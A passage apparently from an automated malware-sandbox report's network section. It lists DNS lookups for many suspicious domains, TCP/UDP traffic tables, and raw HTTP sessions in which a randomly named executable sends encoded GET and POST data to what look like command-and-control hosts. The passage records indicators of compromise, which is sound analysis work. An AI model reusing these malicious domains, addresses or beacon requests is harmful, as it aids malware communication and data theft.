                                                                                                                          Oct 21, 2024 17:28:07.050117970 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.055793047 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.059144020 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.066732883 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.072263956 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631675005 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631716013 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631732941 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631769896 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.631942987 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631963015 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631978989 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631989956 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.631994009 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.632016897 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.671870947 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.711057901 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.711175919 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.712079048 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.717619896 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:24.677115917 CEST5736980192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:28:24.682651043 CEST8057369188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:24.682790995 CEST5736980192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:28:24.690052986 CEST5736980192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:28:24.695385933 CEST8057369188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:25.255880117 CEST8057369188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:25.258739948 CEST8057369188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:25.263211012 CEST5736980192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:28:25.266088009 CEST5736980192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:28:25.271924019 CEST8057369188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:30.268224955 CEST5737080192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:30.273767948 CEST805737052.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:30.273936987 CEST5737080192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:30.283085108 CEST5737080192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:30.288474083 CEST805737052.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:30.849168062 CEST805737052.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:30.849183083 CEST805737052.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:30.849500895 CEST5737080192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:30.928471088 CEST805737052.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:30.928622007 CEST5737080192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:31.796945095 CEST5737080192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:32.819103956 CEST5737180192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:32.824635983 CEST805737152.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:32.827173948 CEST5737180192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:32.839207888 CEST5737180192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:32.844686031 CEST805737152.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:33.397758961 CEST805737152.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:33.397772074 CEST805737152.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:33.397854090 CEST5737180192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:33.476238966 CEST805737152.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:33.476428986 CEST5737180192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:34.343801022 CEST5737180192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:35.361877918 CEST5737280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:35.367502928 CEST805737252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:35.368457079 CEST5737280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:35.377890110 CEST5737280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:35.383331060 CEST805737252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:35.383882046 CEST805737252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:35.945580006 CEST805737252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:35.945635080 CEST805737252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:35.945799112 CEST5737280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:36.026292086 CEST805737252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:36.026390076 CEST5737280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:36.890839100 CEST5737280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:37.908946991 CEST5737380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:37.916708946 CEST805737352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:37.916794062 CEST5737380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:37.922907114 CEST5737380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:37.928929090 CEST805737352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:38.488610983 CEST805737352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:38.488630056 CEST805737352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:38.488784075 CEST5737380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:38.567974091 CEST805737352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:38.568147898 CEST5737380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:38.568907022 CEST5737380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:28:38.574894905 CEST805737352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:51.643209934 CEST5737480192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:28:51.649172068 CEST8057374103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:51.649295092 CEST5737480192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:28:51.659837961 CEST5737480192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:28:51.665360928 CEST8057374103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:52.252650976 CEST8057374103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:52.296977043 CEST5737480192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:28:52.308633089 CEST8057374103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:52.308801889 CEST5737480192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:28:53.172107935 CEST5737480192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:28:54.190395117 CEST5737580192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:28:54.195894957 CEST8057375103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:54.196043968 CEST5737580192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:28:54.206171036 CEST5737580192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:28:54.211589098 CEST8057375103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:54.807488918 CEST8057375103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:54.859421968 CEST5737580192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:28:54.862147093 CEST8057375103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:54.862272024 CEST5737580192.168.2.6103.106.67.112

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 21, 2024 17:24:45.340405941 CEST5838053192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:24:45.359837055 CEST53583801.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:06.003530979 CEST5329653192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:25:06.063461065 CEST53532961.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:19.378331900 CEST5917053192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:25:19.388510942 CEST53591701.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:27.464391947 CEST5182653192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:25:27.857553005 CEST53518261.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.393901110 CEST5546453192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:25:41.409893036 CEST53554641.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:54.597754002 CEST6073553192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:25:54.616698980 CEST53607351.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:09.879092932 CEST6027653192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:26:09.887530088 CEST53602761.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:23.910376072 CEST6397453192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:26:23.959274054 CEST53639741.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:37.300523996 CEST6341053192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:26:38.143071890 CEST53634101.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:51.425838947 CEST6474753192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:26:51.451594114 CEST53647471.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:04.755084038 CEST6096053192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:27:04.972240925 CEST53609601.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:18.346808910 CEST5251853192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:27:18.527806044 CEST53525181.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:31.628984928 CEST6060653192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:27:31.663156986 CEST53606061.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:44.739072084 CEST6043853192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:27:45.608645916 CEST53604381.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:59.346720934 CEST4921153192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:27:59.398462057 CEST53492111.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:12.722768068 CEST5720153192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:28:12.738892078 CEST53572011.1.1.1192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:43.579510927 CEST6385053192.168.2.61.1.1.1
                                                                                                                          Oct 21, 2024 17:28:43.590385914 CEST53638501.1.1.1192.168.2.6

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Oct 21, 2024 17:24:45.340405941 CEST192.168.2.61.1.1.10x3807Standard query (0)www.itemsort.shopA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:06.003530979 CEST192.168.2.61.1.1.10x33f1Standard query (0)www.rudemyvague.infoA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:19.378331900 CEST192.168.2.61.1.1.10x7132Standard query (0)www.gws-treinamento2.shopA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:27.464391947 CEST192.168.2.61.1.1.10xd6d7Standard query (0)www.sailforever.xyzA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:41.393901110 CEST192.168.2.61.1.1.10xf494Standard query (0)www.launchdreamidea.xyzA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:54.597754002 CEST192.168.2.61.1.1.10xa8aStandard query (0)www.mondayigboleague.infoA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:26:09.879092932 CEST192.168.2.61.1.1.10x370aStandard query (0)www.stocksm.funA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:26:23.910376072 CEST192.168.2.61.1.1.10x16a0Standard query (0)www.drevohome.shopA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:26:37.300523996 CEST192.168.2.61.1.1.10x378dStandard query (0)www.givingaway123.netA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:26:51.425838947 CEST192.168.2.61.1.1.10x6f38Standard query (0)www.jagdud.storeA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:04.755084038 CEST192.168.2.61.1.1.10xfd12Standard query (0)www.030002837.xyzA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:18.346808910 CEST192.168.2.61.1.1.10x1c9Standard query (0)www.ethetf.digitalA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:31.628984928 CEST192.168.2.61.1.1.10x2c3eStandard query (0)www.booosted.xyzA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:44.739072084 CEST192.168.2.61.1.1.10xa090Standard query (0)www.djazdgc.tokyoA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:59.346720934 CEST192.168.2.61.1.1.10x490Standard query (0)www.productanalytics.proA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:28:12.722768068 CEST192.168.2.61.1.1.10xad2eStandard query (0)www.kmjai8jf.icuA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:28:43.579510927 CEST192.168.2.61.1.1.10xfbd2Standard query (0)www.gws-treinamento2.shopA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Oct 21, 2024 17:24:45.359837055 CEST1.1.1.1192.168.2.60x3807No error (0)www.itemsort.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:24:45.359837055 CEST1.1.1.1192.168.2.60x3807No error (0)www.itemsort.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:06.063461065 CEST1.1.1.1192.168.2.60x33f1No error (0)www.rudemyvague.info52.13.151.179A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:19.388510942 CEST1.1.1.1192.168.2.60x7132Name error (3)www.gws-treinamento2.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:27.857553005 CEST1.1.1.1192.168.2.60xd6d7No error (0)www.sailforever.xyz103.106.67.112A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:41.409893036 CEST1.1.1.1192.168.2.60xf494No error (0)www.launchdreamidea.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:41.409893036 CEST1.1.1.1192.168.2.60xf494No error (0)www.launchdreamidea.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:54.616698980 CEST1.1.1.1192.168.2.60xa8aNo error (0)www.mondayigboleague.infomondayigboleague.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:54.616698980 CEST1.1.1.1192.168.2.60xa8aNo error (0)mondayigboleague.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:25:54.616698980 CEST1.1.1.1192.168.2.60xa8aNo error (0)mondayigboleague.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:26:23.959274054 CEST1.1.1.1192.168.2.60x16a0No error (0)www.drevohome.shop94.23.162.163A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:26:38.143071890 CEST1.1.1.1192.168.2.60x378dNo error (0)www.givingaway123.net103.224.182.242A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:26:51.451594114 CEST1.1.1.1192.168.2.60x6f38No error (0)www.jagdud.store209.74.64.187A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:04.972240925 CEST1.1.1.1192.168.2.60xfd12No error (0)www.030002837.xyz030002837.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:04.972240925 CEST1.1.1.1192.168.2.60xfd12No error (0)030002837.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:18.527806044 CEST1.1.1.1192.168.2.60x1c9No error (0)www.ethetf.digitalethetf.digitalCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:18.527806044 CEST1.1.1.1192.168.2.60x1c9No error (0)ethetf.digital3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:18.527806044 CEST1.1.1.1192.168.2.60x1c9No error (0)ethetf.digital15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:31.663156986 CEST1.1.1.1192.168.2.60x2c3eNo error (0)www.booosted.xyzbooosted.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:31.663156986 CEST1.1.1.1192.168.2.60x2c3eNo error (0)booosted.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:31.663156986 CEST1.1.1.1192.168.2.60x2c3eNo error (0)booosted.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:45.608645916 CEST1.1.1.1192.168.2.60xa090No error (0)www.djazdgc.tokyolongg002.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:45.608645916 CEST1.1.1.1192.168.2.60xa090No error (0)longg002.cn8.210.49.139A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:27:59.398462057 CEST1.1.1.1192.168.2.60x490No error (0)www.productanalytics.pro94.23.162.163A (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:28:12.738892078 CEST1.1.1.1192.168.2.60xad2eName error (3)www.kmjai8jf.icunonenoneA (IP address)IN (0x0001)false
                                                                                                                          Oct 21, 2024 17:28:43.590385914 CEST1.1.1.1192.168.2.60xfbd2Name error (3)www.gws-treinamento2.shopnonenoneA (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • www.itemsort.shop
                                                                                                                          • www.rudemyvague.info
                                                                                                                          • www.sailforever.xyz
                                                                                                                          • www.launchdreamidea.xyz
                                                                                                                          • www.mondayigboleague.info
                                                                                                                          • www.stocksm.fun
                                                                                                                          • www.drevohome.shop
                                                                                                                          • www.givingaway123.net
                                                                                                                          • www.jagdud.store
                                                                                                                          • www.030002837.xyz
                                                                                                                          • www.ethetf.digital
                                                                                                                          • www.booosted.xyz
                                                                                                                          • www.djazdgc.tokyo
                                                                                                                          • www.productanalytics.pro

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.649930188.114.96.3802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:24:45.379426956 CEST496OUTGET /qw71/?qFHlI=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxCl1maFN4do860hmE4XwK9H8rJm4CQQIXjRIUyqXGbNbQLu85qd4=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.itemsort.shop
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:24:45.945590973 CEST929INHTTP/1.1 404
                                                                                                                          Date: Mon, 21 Oct 2024 15:24:45 GMT
                                                                                                                          Content-Type: text/html;charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n75%2Bil7R73Kb4fScxMflMCfcxbNE6yEgrq7m8moDcuvOzvuMfsIV5vz4gsg%2Fj%2Brz52%2BrEBgix0GzNPOTHlB6DTPU1WqVC1eTH7yyWe1BFV29d%2FDdTiA88EI6ke823iBLoJOsPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6241a1ef0c4239-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=998&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.64998852.13.151.179802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:06.085642099 CEST760OUTPOST /t7t4/ HTTP/1.1
                                                                                                                          Host: www.rudemyvague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.rudemyvague.info
                                                                                                                          Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 56 6e 6f 42 37 71 2b 53 35 7a 5a 65 62 2f 30 50 68 4d 5a 61 38 4f 6a 57 76 43 65 74 76 46 49 62 66 74 4f 6d 4f 6d 72 37 51 51 2f 4f 70 66 56 39 4e 64 49 61 50 56 55 39 51 35 63 35 70 6e 53 6d 5a 4a 37 63 6f 2f 6d 58 4e 58 71 65 61 43 69 72 6a 54 32 67 64 2b 73 39 48 51 70 71 72 36 64 39 72 61 6e 2b 52 47 42 58 37 56 56 69 2f 75 75 64 62 33 42 37 6c 34 30 4c 30 51 52 51 30 2b 6f 48 77 50 59 6c 69 45 79 79 2b 34 41 59 38 4d 6d 4a 4c 46 41 53 63 6b 53 2b 45 70 69 30 50 50 57 35 59 30 41 70 56 64 41 2f 4c 58 59 35 6f 2f 49 6e 42 47 46 30 53 43 41 63 2b 51 4e 42 56 72 4f 51
                                                                                                                          Data Ascii: qFHlI=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFASckS+Epi0PPW5Y0ApVdA/LXY5o/InBGF0SCAc+QNBVrOQ
                                                                                                                          Oct 21, 2024 17:25:06.652379990 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.10.3
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:06 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Powered-By: PHP/5.3.3
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                          Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Permissions-Policy: geolocation=(), microphone=()
                                                                                                                          Expires: 0
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                          Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS$QV+/{[FA8i"Q{ml7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_Tg8]yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NPo86YIpvYpmi?.4/X.
